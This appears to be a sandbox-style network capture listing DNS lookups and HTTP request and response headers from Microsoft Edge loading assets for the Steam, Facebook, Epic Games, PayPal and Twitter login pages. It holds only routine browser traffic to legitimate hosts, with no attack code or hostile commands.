user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Fri, 03 Nov 2023 04:50:24 GMT
content-type: text/css;charset=UTF-8
last-modified: Tue, 31 Oct 2023 22:26:31 GMT
cache-control: public,max-age=15552000
expires: Sun, 28 Apr 2024 22:27:43 GMT
x-cache: HIT
cf-cache-status: HIT
age: 195760
vary: Accept-Encoding
server: cloudflare
cf-ray: 8201ff09bb706709-AMS
content-encoding: gzip
GET

https://community.cloudflare.steamstatic.com/public/javascript/applications/community/chunk~f036ce556.js?contenthash=ac03edb408dbe839c029

MicrosoftEdgeCP.exe

Remote address:

172.64.145.151:443

Request

GET /public/javascript/applications/community/chunk~f036ce556.js?contenthash=ac03edb408dbe839c029 HTTP/2.0
host: community.cloudflare.steamstatic.com
accept: application/javascript, */*;q=0.8
referer: https://steamcommunity.com/openid/loginform/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Fri, 03 Nov 2023 04:50:24 GMT
content-type: text/css;charset=UTF-8
last-modified: Wed, 24 Aug 2022 20:34:39 GMT
cache-control: public,max-age=15552000
expires: Thu, 15 Feb 2024 20:35:45 GMT
edge-control: !no-store,!bypass-cache,max-age=15552000
x-cache: HIT
cf-cache-status: HIT
age: 79091
vary: Accept-Encoding
server: cloudflare
cf-ray: 8201ff09bb726709-AMS
content-encoding: gzip
GET

https://community.cloudflare.steamstatic.com/public/css/applications/community/login.css?contenthash=120ef11d3786830c5571

MicrosoftEdgeCP.exe

Remote address:

172.64.145.151:443

Request

GET /public/css/applications/community/login.css?contenthash=120ef11d3786830c5571 HTTP/2.0
host: community.cloudflare.steamstatic.com
accept: text/css, */*
referer: https://steamcommunity.com/openid/loginform/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Fri, 03 Nov 2023 04:50:24 GMT
content-type: text/javascript;charset=UTF-8
last-modified: Tue, 10 Oct 2023 22:56:04 GMT
cache-control: public,max-age=15552000
expires: Sun, 07 Apr 2024 22:57:22 GMT
edge-control: !no-store,!bypass-cache,max-age=15552000
x-cache: HIT
cf-cache-status: HIT
age: 2008380
vary: Accept-Encoding
server: cloudflare
cf-ray: 8201ff09bb716709-AMS
content-encoding: gzip
GET

https://community.cloudflare.steamstatic.com/public/javascript/applications/community/login.js?contenthash=9567e17c46c30d2a2a6f

MicrosoftEdgeCP.exe

Remote address:

172.64.145.151:443

Request

GET /public/javascript/applications/community/login.js?contenthash=9567e17c46c30d2a2a6f HTTP/2.0
host: community.cloudflare.steamstatic.com
accept: application/javascript, */*;q=0.8
referer: https://steamcommunity.com/openid/loginform/
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Fri, 03 Nov 2023 04:50:24 GMT
content-type: text/javascript;charset=UTF-8
last-modified: Tue, 26 Sep 2023 22:36:31 GMT
cache-control: public,max-age=15552000
expires: Sun, 24 Mar 2024 22:38:01 GMT
x-cache: MISS
cf-cache-status: HIT
age: 264637
vary: Accept-Encoding
server: cloudflare
cf-ray: 8201ff09bb736709-AMS
content-encoding: gzip
GET

https://twitter.com/favicon.ico

MicrosoftEdge.exe

Remote address:

104.244.42.129:443

Request

GET /favicon.ico HTTP/2.0
host: twitter.com
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
dnt: 1

Response

HTTP/2.0 200

date: Fri, 03 Nov 2023 04:49:52 UTC
perf: 7626143928
server: tsa_o
set-cookie: guest_id=v1%3A169898699267561325; Max-Age=34214400; Expires=Tue, 03 Dec 2024 04:49:52 GMT; Path=/; Domain=.twitter.com; Secure
content-type: image/x-icon
cache-control: no-cache, no-store, max-age=0
content-length: 1150
x-transaction-id: 679dfecc25cf0d5b
strict-transport-security: max-age=631138519
x-response-time: 99
x-connection-hash: 5a2a69c99650dcf4d5f85b63612b032a7b35e791d719cf53bae737a9b8767477
DNS

fbsbx.com

MicrosoftEdgeCP.exe

Remote address:

8.8.8.8:53

Request

fbsbx.com

IN A

Response

fbsbx.com

IN A

157.240.5.35
GET

https://fbsbx.com/security/hsts-pixel.gif

MicrosoftEdgeCP.exe

Remote address:

157.240.5.35:443

Request

GET /security/hsts-pixel.gif HTTP/2.0
host: fbsbx.com
accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

vary: Accept-Encoding
content-encoding: br
content-type: image/gif
reporting-endpoints:
content-security-policy: default-src data: blob: *.fbcdn.net *.fbsbx.com;script-src *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src data: blob: 'unsafe-inline' *.fbcdn.net *.fbsbx.com;connect-src *.fbcdn.net attachment.fbsbx.com blob: 'self' *.fbsbx.com;font-src *.fbsbx.com fbsbx.com *.fbcdn.net data:;img-src *.fbsbx.com *.fbcdn.net data: blob:;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0;
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(), midi=(), payment=(), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy: same-origin-allow-popups
pragma: no-cache
cache-control: private, no-cache, no-store, must-revalidate
expires: Sat, 01 Jan 2000 00:00:00 GMT
x-content-type-options: nosniff
x-xss-protection: 0
x-frame-options: DENY
access-control-allow-origin: *
strict-transport-security: max-age=31536000; preload; includeSubDomains
x-fb-debug: RLZ6Bi4q8fyNPzGvNpZ4SSxV+3xGtSX+oayVkcTucyav6WwSdTm9yCV6GMHwfB3nDxHFAZWaRjlEXH7mHQtvDA==
date: Fri, 03 Nov 2023 04:49:52 GMT
alt-svc: h3=":443"; ma=86400
DNS

static-assets-prod.unrealengine.com

MicrosoftEdgeCP.exe

Remote address:

8.8.8.8:53

Request

static-assets-prod.unrealengine.com

IN A

Response

static-assets-prod.unrealengine.com

IN CNAME

d1z9autcf703pk.cloudfront.net

d1z9autcf703pk.cloudfront.net

IN A

18.239.36.73

d1z9autcf703pk.cloudfront.net

IN A

18.239.36.105

d1z9autcf703pk.cloudfront.net

IN A

18.239.36.22

d1z9autcf703pk.cloudfront.net

IN A

18.239.36.103
GET

https://static-assets-prod.unrealengine.com/account-portal/static/static/js/3.520a7eda.chunk.js

MicrosoftEdgeCP.exe

Remote address:

18.239.36.73:443

Request

GET /account-portal/static/static/js/3.520a7eda.chunk.js HTTP/2.0
host: static-assets-prod.unrealengine.com
accept: application/javascript, */*;q=0.8
referer: https://www.epicgames.com/id/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

content-type: application/javascript
date: Mon, 30 Oct 2023 16:55:32 GMT
last-modified: Mon, 30 Oct 2023 16:50:20 GMT
etag: W/"13bcc7887b059b2d3d80f0e0b7abd615"
x-amz-server-side-encryption: AES256
server: AmazonS3
content-encoding: gzip
vary: Accept-Encoding,Access-Control-Request-Headers,Access-Control-Request-Method,Origin
x-cache: Hit from cloudfront
via: 1.1 f7534ef0cb2fd28f5c17e7cc694ad68a.cloudfront.net (CloudFront)
x-amz-cf-pop: AMS58-P2
x-amz-cf-id: LWh6WYNIbnUrvH2sG0pmR4Y61m_cSpETuRy7YBmjL_6WxmSKjjI-9Q==
age: 302062
GET

https://static-assets-prod.unrealengine.com/account-portal/static/static/js/main.10a25667.chunk.js

MicrosoftEdgeCP.exe

Remote address:

18.239.36.73:443

Request

GET /account-portal/static/static/js/main.10a25667.chunk.js HTTP/2.0
host: static-assets-prod.unrealengine.com
accept: application/javascript, */*;q=0.8
referer: https://www.epicgames.com/id/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

content-type: application/javascript
date: Mon, 30 Oct 2023 16:55:32 GMT
last-modified: Mon, 30 Oct 2023 16:50:21 GMT
etag: W/"61dcc305464ea7b73041d1d0a46f52ff"
x-amz-server-side-encryption: AES256
server: AmazonS3
content-encoding: gzip
vary: Accept-Encoding,Access-Control-Request-Headers,Access-Control-Request-Method,Origin
x-cache: Hit from cloudfront
via: 1.1 f7534ef0cb2fd28f5c17e7cc694ad68a.cloudfront.net (CloudFront)
x-amz-cf-pop: AMS58-P2
x-amz-cf-id: nHjsDB7oP8jW9mbrAAoh0yk3loyFLj20EfuCdpAxLYL363yr_uz12w==
age: 302062
GET

https://static-assets-prod.unrealengine.com/account-portal/static/static/css/4.2a621477.chunk.css

MicrosoftEdgeCP.exe

Remote address:

18.239.36.73:443

Request

GET /account-portal/static/static/css/4.2a621477.chunk.css HTTP/2.0
host: static-assets-prod.unrealengine.com
accept: text/css, */*
referer: https://www.epicgames.com/id/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

content-type: text/css
date: Wed, 01 Nov 2023 19:41:32 GMT
last-modified: Mon, 30 Oct 2023 16:50:19 GMT
etag: W/"152f94ae12e71962b5325dfc3d261a29"
x-amz-server-side-encryption: AES256
server: AmazonS3
content-encoding: gzip
vary: Accept-Encoding,Access-Control-Request-Headers,Access-Control-Request-Method,Origin
x-cache: Hit from cloudfront
via: 1.1 f7534ef0cb2fd28f5c17e7cc694ad68a.cloudfront.net (CloudFront)
x-amz-cf-pop: AMS58-P2
x-amz-cf-id: Bw6j5cS2ctITSeWo4k_D5re_9ejfBwXGtLVNjNIC05Kpj4tkp35Xqw==
age: 119303
GET

https://static-assets-prod.unrealengine.com/account-portal/static/static/js/4.d4dd1ef3.chunk.js

MicrosoftEdgeCP.exe

Remote address:

18.239.36.73:443

Request

GET /account-portal/static/static/js/4.d4dd1ef3.chunk.js HTTP/2.0
host: static-assets-prod.unrealengine.com
accept: application/javascript, */*;q=0.8
referer: https://www.epicgames.com/id/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

content-type: application/javascript
date: Mon, 30 Oct 2023 16:55:33 GMT
last-modified: Mon, 30 Oct 2023 16:50:20 GMT
etag: W/"bd75824b8ce16f5fca29deaf1e3e911e"
x-amz-server-side-encryption: AES256
server: AmazonS3
content-encoding: gzip
vary: Accept-Encoding,Access-Control-Request-Headers,Access-Control-Request-Method,Origin
x-cache: Hit from cloudfront
via: 1.1 f7534ef0cb2fd28f5c17e7cc694ad68a.cloudfront.net (CloudFront)
x-amz-cf-pop: AMS58-P2
x-amz-cf-id: _AjQzDll8FcJsDDshRqzMYoEyl3ruU5k3a3_4-h7h3rN6N2GUTvsqA==
age: 302062
GET

https://static-assets-prod.unrealengine.com/account-portal/static/static/js/polyfills.b542ecef.chunk.js

MicrosoftEdgeCP.exe

Remote address:

18.239.36.73:443

Request

GET /account-portal/static/static/js/polyfills.b542ecef.chunk.js HTTP/2.0
host: static-assets-prod.unrealengine.com
accept: application/javascript, */*;q=0.8
referer: https://www.epicgames.com/id/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

content-type: application/javascript
date: Mon, 30 Oct 2023 16:55:33 GMT
last-modified: Mon, 30 Oct 2023 16:50:21 GMT
etag: W/"68b0a6999b50a7ed9ebed87b1812a300"
x-amz-server-side-encryption: AES256
server: AmazonS3
content-encoding: gzip
vary: Accept-Encoding,Access-Control-Request-Headers,Access-Control-Request-Method,Origin
x-cache: Hit from cloudfront
via: 1.1 f7534ef0cb2fd28f5c17e7cc694ad68a.cloudfront.net (CloudFront)
x-amz-cf-pop: AMS58-P2
x-amz-cf-id: hu4FjKv9CHGInoDt-kl1DLRztspIU0QYpZ7TrKZCkNE-ySGij9Dhhg==
age: 302062
GET

https://static-assets-prod.unrealengine.com/account-portal/static/static/media/Brutal-Light.cc0166f5.woff2

MicrosoftEdgeCP.exe

Remote address:

18.239.36.73:443

Request

GET /account-portal/static/static/media/Brutal-Light.cc0166f5.woff2 HTTP/2.0
host: static-assets-prod.unrealengine.com
accept: */*
referer: https://www.epicgames.com/id/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
origin: https://www.epicgames.com
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

content-type: binary/octet-stream
content-length: 20248
access-control-allow-origin: https://www.epicgames.com
access-control-allow-methods: GET, HEAD
access-control-max-age: 3000
access-control-allow-credentials: true
last-modified: Tue, 12 Sep 2023 20:38:10 GMT
x-amz-server-side-encryption: AES256
accept-ranges: bytes
server: AmazonS3
date: Tue, 31 Oct 2023 18:12:00 GMT
etag: "a724d1efe0d15b8e9f08ad0288e177fd"
vary: Accept-Encoding,Origin,Access-Control-Request-Headers,Access-Control-Request-Method
x-cache: Hit from cloudfront
via: 1.1 f7534ef0cb2fd28f5c17e7cc694ad68a.cloudfront.net (CloudFront)
x-amz-cf-pop: AMS58-P2
x-amz-cf-id: bQOnvDkWGCGk8RBo3v9sdjNNho8FgAgVECXr_AVUKHX_QGfkNEcj0A==
age: 211101
GET

https://static-assets-prod.unrealengine.com/account-portal/static/static/media/Brutal-Regular.85a5d915.woff2

MicrosoftEdgeCP.exe

Remote address:

18.239.36.73:443

Request

GET /account-portal/static/static/media/Brutal-Regular.85a5d915.woff2 HTTP/2.0
host: static-assets-prod.unrealengine.com
accept: */*
referer: https://www.epicgames.com/id/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
origin: https://www.epicgames.com
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

content-type: binary/octet-stream
content-length: 27668
access-control-allow-origin: https://www.epicgames.com
access-control-allow-methods: GET, HEAD
access-control-max-age: 3000
access-control-allow-credentials: true
last-modified: Mon, 11 Sep 2023 16:46:04 GMT
x-amz-server-side-encryption: AES256
accept-ranges: bytes
server: AmazonS3
date: Thu, 12 Oct 2023 11:40:45 GMT
etag: "4555758a9a1a19e87a66eceaf00b1b23"
vary: Accept-Encoding,Origin,Access-Control-Request-Headers,Access-Control-Request-Method
x-cache: Hit from cloudfront
via: 1.1 f7534ef0cb2fd28f5c17e7cc694ad68a.cloudfront.net (CloudFront)
x-amz-cf-pop: AMS58-P2
x-amz-cf-id: qe2qWPLHszhxhFJHmuvcaGFhXHSI3DM0LUXGXc0WkdT92RMc1u77Qw==
age: 1876173
GET

https://static-assets-prod.unrealengine.com/account-portal/static/static/media/Brutal-Medium.df2da420.woff2

MicrosoftEdgeCP.exe

Remote address:

18.239.36.73:443

Request

GET /account-portal/static/static/media/Brutal-Medium.df2da420.woff2 HTTP/2.0
host: static-assets-prod.unrealengine.com
accept: */*
referer: https://www.epicgames.com/id/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
origin: https://www.epicgames.com
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

content-type: binary/octet-stream
content-length: 26940
date: Sun, 29 Oct 2023 20:03:39 GMT
access-control-allow-origin: https://www.epicgames.com
access-control-allow-methods: GET, HEAD
access-control-max-age: 3000
access-control-allow-credentials: true
last-modified: Fri, 20 Oct 2023 18:50:19 GMT
etag: "5f601a4caa6f187bd35621b49fc8e2bc"
x-amz-server-side-encryption: AES256
accept-ranges: bytes
server: AmazonS3
vary: Origin,Access-Control-Request-Headers,Access-Control-Request-Method
x-cache: Hit from cloudfront
via: 1.1 f7534ef0cb2fd28f5c17e7cc694ad68a.cloudfront.net (CloudFront)
x-amz-cf-pop: AMS58-P2
x-amz-cf-id: J5ydmGPu9RzzFwJ9mKga63VT0HHcM_UWbcTCYCOFN1ZIJelN7m0aKA==
age: 377199
GET

https://static-assets-prod.unrealengine.com/account-portal/static/static/media/Brutal-Bold.402a3847.woff2

MicrosoftEdgeCP.exe

Remote address:

18.239.36.73:443

Request

GET /account-portal/static/static/media/Brutal-Bold.402a3847.woff2 HTTP/2.0
host: static-assets-prod.unrealengine.com
accept: */*
referer: https://www.epicgames.com/id/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
origin: https://www.epicgames.com
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

content-type: binary/octet-stream
content-length: 27176
date: Sun, 29 Oct 2023 20:03:39 GMT
access-control-allow-origin: https://www.epicgames.com
access-control-allow-methods: GET, HEAD
access-control-max-age: 3000
access-control-allow-credentials: true
last-modified: Fri, 20 Oct 2023 18:50:19 GMT
etag: "0dfc6422538b3d86ce582109b873e084"
x-amz-server-side-encryption: AES256
accept-ranges: bytes
server: AmazonS3
vary: Origin,Access-Control-Request-Headers,Access-Control-Request-Method
x-cache: Hit from cloudfront
via: 1.1 f7534ef0cb2fd28f5c17e7cc694ad68a.cloudfront.net (CloudFront)
x-amz-cf-pop: AMS58-P2
x-amz-cf-id: aGuMz4Hre7B-2UT4acnmPeKxXXOMO4ookYRumSrrBxXox4ZvV1T7Tw==
age: 377199
GET

https://static-assets-prod.unrealengine.com/account-portal/static/static/js/45.2939e070.chunk.js

MicrosoftEdgeCP.exe

Remote address:

18.239.36.73:443

Request

GET /account-portal/static/static/js/45.2939e070.chunk.js HTTP/2.0
host: static-assets-prod.unrealengine.com
accept: application/javascript, */*;q=0.8
referer: https://www.epicgames.com/id/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

content-type: application/javascript
date: Mon, 30 Oct 2023 16:55:34 GMT
last-modified: Mon, 30 Oct 2023 16:50:20 GMT
etag: W/"6aa4c9c7e50667969d1fd6b05297da1f"
x-amz-server-side-encryption: AES256
server: AmazonS3
content-encoding: gzip
vary: Accept-Encoding,Access-Control-Request-Headers,Access-Control-Request-Method,Origin
x-cache: Hit from cloudfront
via: 1.1 f7534ef0cb2fd28f5c17e7cc694ad68a.cloudfront.net (CloudFront)
x-amz-cf-pop: AMS58-P2
x-amz-cf-id: jwJDVqC-I5PYpkb1q8dMd_hnYtFCjS-6y4THtp8Di4poY3a-vyquxw==
age: 302090
GET

https://static-assets-prod.unrealengine.com/account-portal/static/static/js/12.aaac59ae.chunk.js

MicrosoftEdgeCP.exe

Remote address:

18.239.36.73:443

Request

GET /account-portal/static/static/js/12.aaac59ae.chunk.js HTTP/2.0
host: static-assets-prod.unrealengine.com
accept: application/javascript, */*;q=0.8
referer: https://www.epicgames.com/id/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

content-type: application/javascript
date: Mon, 30 Oct 2023 16:55:35 GMT
last-modified: Mon, 30 Oct 2023 16:50:19 GMT
etag: W/"69e7ea73cdf1fd738a609fb0f8abc62d"
x-amz-server-side-encryption: AES256
server: AmazonS3
content-encoding: gzip
vary: Accept-Encoding,Access-Control-Request-Headers,Access-Control-Request-Method,Origin
x-cache: Hit from cloudfront
via: 1.1 f7534ef0cb2fd28f5c17e7cc694ad68a.cloudfront.net (CloudFront)
x-amz-cf-pop: AMS58-P2
x-amz-cf-id: gUdPMJCLEIIqrmPVwGzUYm3cX36KLNEQE9PvlNQRMRycGhvcZf2thw==
age: 302107
DNS

tracking.epicgames.com

MicrosoftEdgeCP.exe

Remote address:

8.8.8.8:53

Request

tracking.epicgames.com

IN A

Response

tracking.epicgames.com

IN CNAME

tracking-website-prod-674464163.us-east-1.elb.amazonaws.com

tracking-website-prod-674464163.us-east-1.elb.amazonaws.com

IN A

52.6.150.116

tracking-website-prod-674464163.us-east-1.elb.amazonaws.com

IN A

54.158.204.155

tracking-website-prod-674464163.us-east-1.elb.amazonaws.com

IN A

54.172.4.166
DNS

www.paypalobjects.com

MicrosoftEdgeCP.exe

Remote address:

8.8.8.8:53

Request

www.paypalobjects.com

IN A

Response

www.paypalobjects.com

IN CNAME

ppo.glb.paypal.com

ppo.glb.paypal.com

IN CNAME

cs1150.wpc.betacdn.net

cs1150.wpc.betacdn.net

IN A

192.229.221.25
GET

https://tracking.epicgames.com/tracking.js

MicrosoftEdgeCP.exe

Remote address:

52.6.150.116:443

Request

GET /tracking.js HTTP/2.0
host: tracking.epicgames.com
accept: application/javascript, */*;q=0.8
referer: https://www.epicgames.com/id/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

date: Fri, 03 Nov 2023 04:49:53 GMT
content-type: application/javascript; charset=utf-8
vary: Accept-Encoding
x-dns-prefetch-control: off
x-frame-options: SAMEORIGIN
strict-transport-security: max-age=15552000
x-download-options: noopen
x-content-type-options: nosniff
x-xss-protection: 1; mode=block
x-epic-correlation-id: 6da100f0-7a04-11ee-8742-3392ece6ebc8
set-cookie: _epicSID=37d6c431172443c29eb08662417d4dbb; Domain=.epicgames.com; Path=/; Secure; SameSite=None
etag: W/"ffa0-XzfPTEog1KORjM8h78ATi/tPofw"
content-encoding: gzip
GET

https://tracking.epicgames.com/track.png?referringUrl=none&location=https%3A%2F%2Fwww.epicgames.com%2Fid%2Flogin&now=1698987017346&eventType=pageView

MicrosoftEdgeCP.exe

Remote address:

52.6.150.116:443

Request

GET /track.png?referringUrl=none&location=https%3A%2F%2Fwww.epicgames.com%2Fid%2Flogin&now=1698987017346&eventType=pageView HTTP/2.0
host: tracking.epicgames.com
accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
referer: https://www.epicgames.com/id/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br
cookie: _epicSID=37d6c431172443c29eb08662417d4dbb; EPIC_DEVICE=220756edbf1c4b8a8582305780ddbf17

Response

HTTP/2.0 204

date: Fri, 03 Nov 2023 04:50:20 GMT
x-dns-prefetch-control: off
x-frame-options: SAMEORIGIN
strict-transport-security: max-age=15552000
x-download-options: noopen
x-content-type-options: nosniff
x-xss-protection: 1; mode=block
x-epic-correlation-id: 7da00140-7a04-11ee-9b12-0b3353f6e7f0
pragma: no-cache
expires: 0
cache-control: no-cache, no-store, must-revalidate
etag: W/"a-bAsFyilMr4Ra1hIU5PyoyFRunpI"
GET

https://tracking.epicgames.com/track.png?interactionType=duration&eventCategory=login&eventAction=login&provider=undefined&flow=login&clientId=null&displayMode=web&eventType=interaction&application=EPICEVENTTRACKING&appEnv=prod&userAgent=Mozilla%2F5.0%20(Windows%20NT%2010.0%3B%20Win64%3B%20x64)%20AppleWebKit%2F537.36%20(KHTML%2C%20like%20Gecko)%20Chrome%2F52.0.2743.116%20Safari%2F537.36%20Edge%2F15.15063&eventDate=2023-11-03T04%3A50%3A32.075Z&strategy=isolatedTestFlagEnabled%3Dfalse&trackingUUID=37d6c431172443c29eb08662417d4dbb&eventLabel=navigator-%3E%2Flogin&eventValue=21087&referringUrl=none&location=https%3A%2F%2Fwww.epicgames.com%2Fid%2Flogin&now=1698987032076

MicrosoftEdgeCP.exe

Remote address:

52.6.150.116:443

Request

GET /track.png?interactionType=duration&eventCategory=login&eventAction=login&provider=undefined&flow=login&clientId=null&displayMode=web&eventType=interaction&application=EPICEVENTTRACKING&appEnv=prod&userAgent=Mozilla%2F5.0%20(Windows%20NT%2010.0%3B%20Win64%3B%20x64)%20AppleWebKit%2F537.36%20(KHTML%2C%20like%20Gecko)%20Chrome%2F52.0.2743.116%20Safari%2F537.36%20Edge%2F15.15063&eventDate=2023-11-03T04%3A50%3A32.075Z&strategy=isolatedTestFlagEnabled%3Dfalse&trackingUUID=37d6c431172443c29eb08662417d4dbb&eventLabel=navigator-%3E%2Flogin&eventValue=21087&referringUrl=none&location=https%3A%2F%2Fwww.epicgames.com%2Fid%2Flogin&now=1698987032076 HTTP/2.0
host: tracking.epicgames.com
accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
referer: https://www.epicgames.com/id/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br
cookie: _epicSID=37d6c431172443c29eb08662417d4dbb; EPIC_DEVICE=220756edbf1c4b8a8582305780ddbf17

Response

HTTP/2.0 204

date: Fri, 03 Nov 2023 04:50:38 GMT
x-dns-prefetch-control: off
x-frame-options: SAMEORIGIN
strict-transport-security: max-age=15552000
x-download-options: noopen
x-content-type-options: nosniff
x-xss-protection: 1; mode=block
x-epic-correlation-id: 88de4530-7a04-11ee-abe5-fd8c2b094d25
pragma: no-cache
expires: 0
cache-control: no-cache, no-store, must-revalidate
etag: W/"a-bAsFyilMr4Ra1hIU5PyoyFRunpI"
GET

https://www.paypalobjects.com/webcaptcha/ngrlCaptcha.min.js

MicrosoftEdgeCP.exe

Remote address:

192.229.221.25:443

Request

GET /webcaptcha/ngrlCaptcha.min.js HTTP/2.0
host: www.paypalobjects.com
accept: application/javascript, */*;q=0.8
referer: https://www.paypal.com/signin
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

content-encoding: gzip
cache-control: s-maxage=31536000, public,max-age=3600
content-type: application/javascript
date: Fri, 03 Nov 2023 04:49:53 GMT
dc: ccg11-origin-www-1.paypal.com
etag: W/"64ecc60d-5a30"
expires: Fri, 03 Nov 2023 05:49:53 GMT
last-modified: Mon, 28 Aug 2023 16:06:37 GMT
paypal-debug-id: e6f64c4a64bec
server: ECAcc (ama/48F2)
strict-transport-security: max-age=63072000; includeSubDomains; preload
timing-allow-origin: https://www.paypal.com,https://www.sandbox.paypal.com
traceparent: 00-0000000000000000000e6f64c4a64bec-6864a39715dbc40c-01
vary: Accept-Encoding
x-cache: HIT
x-content-type-options: nosniff
content-length: 6752
GET

https://www.paypalobjects.com/web/res/9be/71f219fbd1e6dd2c9264422cf6969/css/contextualLoginElementalUIv2.css

MicrosoftEdgeCP.exe

Remote address:

192.229.221.25:443

Request

GET /web/res/9be/71f219fbd1e6dd2c9264422cf6969/css/contextualLoginElementalUIv2.css HTTP/2.0
host: www.paypalobjects.com
accept: text/css, */*
referer: https://www.paypal.com/signin
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

content-encoding: gzip
accept-ranges: bytes
access-control-allow-headers: x-csrf-token
access-control-allow-methods: GET
access-control-allow-origin: *
cache-control: max-age=31536000, s-maxage=31536000
content-type: text/css
date: Fri, 03 Nov 2023 04:49:53 GMT
dc: ccg11-origin-www-1.paypal.com
etag: W/"653bf0d9-259ab"
expires: Sat, 02 Nov 2024 04:49:53 GMT
last-modified: Fri, 27 Oct 2023 17:18:17 GMT
paypal-debug-id: f927a16707666
server: ECAcc (ama/48AD)
strict-transport-security: max-age=63072000; includeSubDomains; preload
